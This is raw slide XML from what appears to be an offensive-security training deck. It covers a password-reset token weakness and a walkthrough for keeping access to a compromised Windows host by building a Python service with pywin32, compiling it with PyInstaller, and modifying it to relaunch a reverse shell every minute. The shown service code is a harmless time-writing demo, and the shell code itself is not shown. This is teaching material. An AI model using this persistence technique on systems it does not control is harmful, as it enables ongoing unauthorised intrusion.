              <a:t>This number can be calculated by the attacker and then hashed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>SHA1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This can essentially be used to reset any user’s password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD4B563-1188-4BB8-9BD8-CC120454782F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36863781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653713" y="1199980"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Maintaining Access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170</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20203" y="2470155"/>
            <a:ext cx="10096713" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this section, we’ll assume that we’ve compromised both a Windows system and a Linux-based system.</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We will discuss how we can extend our access even if the original exploit is patched.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233014030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171</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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several ways maintain access to a Windows compromised system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One such way we’ll discuss is through creating a Windows service.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will start by installing the dependency</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945106" y="3429000"/>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pip install pywin32</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE2F57F-0C1A-4601-BA4A-7A21F20DAF59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948276" y="3803802"/>
            <a:ext cx="7481849"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installed, we’ll create a simple service that will run every minute.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC4BE49-21E5-4AFE-A360-04DBF754BC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948276" y="4327039"/>
            <a:ext cx="7976937" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PoC service will write the time every minute to the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>C:\test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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start by importing necessary libraries.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B133FAE8-E580-4C40-878A-3C853B55AF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1913022" y="5221106"/>
            <a:ext cx="9821776"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time</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win32serviceutil</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win32service</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win32event</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30271802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172</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we’ll start writing the class that represents our service:</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810982" y="2586790"/>
            <a:ext cx="9821776"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class</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MyService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win32serviceutil</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ServiceFramework</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svc_name</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MyService</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svc_display_name</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"My first service"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svc_description</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"Writes the date to a file named"</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 test.txt in the C drive."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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</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args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1000</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60</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Every minute.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win32serviceutil.ServiceFramework.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__init__</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args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.hWaitStop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = win32event.CreateEvent(</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9343130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173</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we’ll implement the methods that will handle starting and stopping the service:</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810982" y="2586790"/>
            <a:ext cx="9821776" cy="203132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SvcStop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.ReportServiceStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(win32service.SERVICE_STOP_PENDING)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        win32event.SetEvent(</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.hWaitStop</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SvcDoRun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.ReportServiceStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(win32service.SERVICE_RUNNING)</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4611922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174</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we’ll write the main method, which will be invoked once the service is initiated:</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810982" y="2586790"/>
            <a:ext cx="9821776" cy="224676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ret_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = win32event.WaitForSingleObject(</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.hWaitStop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ret_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == win32event.WAIT_OBJECT_0:</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servicemanager.LogInfoMsg</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"Service is stopping"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break</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open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test.txt"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f:</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f.write</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"Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, time now is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time.ctime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7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\n</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131527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175</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, we’ll define the last part of our service, which will include the handling of service commands:</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810982" y="2658979"/>
            <a:ext cx="9821776"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servicemanager.Initialize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servicemanager.PrepareToHostSingle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MyService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servicemanager.StartServiceCtrlDispatcher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win32serviceutil.HandleCommandLine(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyService</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04657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176</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pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we will compile the code using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyInstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</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6" name="TextBox 5" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B93D28-3B67-43B4-A9F8-678E849721B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1810982" y="2658979"/>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pyinstaller.exe --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hiddenimport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> win32timezone --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --icon NONE .\my_service.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E610D3-8C02-4AFA-BE79-A29B95A00D5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948276" y="3244334"/>
            <a:ext cx="10096713" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will produce a single output file:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4707A6E8-6EAA-4BF3-8635-1806C5DD0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8763" y="3809470"/>
            <a:ext cx="10220325" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12694110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177</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923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we’ll run PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>as administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and move to the folder where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>my_service.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is located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If we run it with any option such as “-h”</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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBCE018-89E8-4D2A-8A01-D5C27AF9CD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493" y="3056601"/>
            <a:ext cx="10478052" cy="3448473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133852688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178</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7" y="2133271"/>
            <a:ext cx="10096713" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To install &amp; start the service, we’ll execute:</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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7948061-2CEF-4E50-A473-5A82E26A1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514" y="2614863"/>
            <a:ext cx="11349974" cy="1498837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA86D78-0411-45A7-ABB2-F8C7C50685F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9424737" y="2835442"/>
            <a:ext cx="2438400" cy="30079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732A5B4E-2A1B-482F-90AD-EAC22670A711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9450088" y="3441032"/>
            <a:ext cx="2413049" cy="30079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3139208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179</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4109143" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, if we look for our services in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Start &gt; Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we will be able to find our installed service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will also notice that it’s running.</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can notice that it’s running under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771E958E-FA45-4239-B345-BD267351B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7421" y="1844408"/>
            <a:ext cx="6613978" cy="4995294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023E91FD-E022-4B0E-B6A4-E50F6E4AFF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197642" y="4604085"/>
            <a:ext cx="1459832" cy="30079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Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8835EF89-A770-468C-843F-60AD0FB253EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197641" y="6573252"/>
            <a:ext cx="6513095" cy="266449"/>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243374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Writing basic web exploits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link to be used to reset the password will look like</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF812BB-E42E-4197-8031-23588E86D15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777215" y="2282859"/>
            <a:ext cx="10137507" cy="33855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http://172.16.238.100/reset?code=&lt;token&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211DDD2F-95F0-4FF9-968A-6D28326961D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42203782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180</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browse the file we should be writing to, we will find that it has been successfully written to as shown:</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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{925ABB9D-575E-400D-BE88-7C1794D79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727" y="2564773"/>
            <a:ext cx="8406315" cy="4148680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30344079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181</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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we will modify our service to execute our previously developed reverse shell every minute instead of writing the time to a tedious file.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will update our imports to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>subprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</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7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B02AAC3-CA02-4E44-90B2-1D75806405C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003488" y="3481137"/>
            <a:ext cx="9821776"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subprocess</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win32serviceutil</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win32service</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win32event</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35872010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182</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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we will add a global variable indicating the path of our reverse shell executable that we developed earlier on disk.</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7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B02AAC3-CA02-4E44-90B2-1D75806405C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1810982" y="2871537"/>
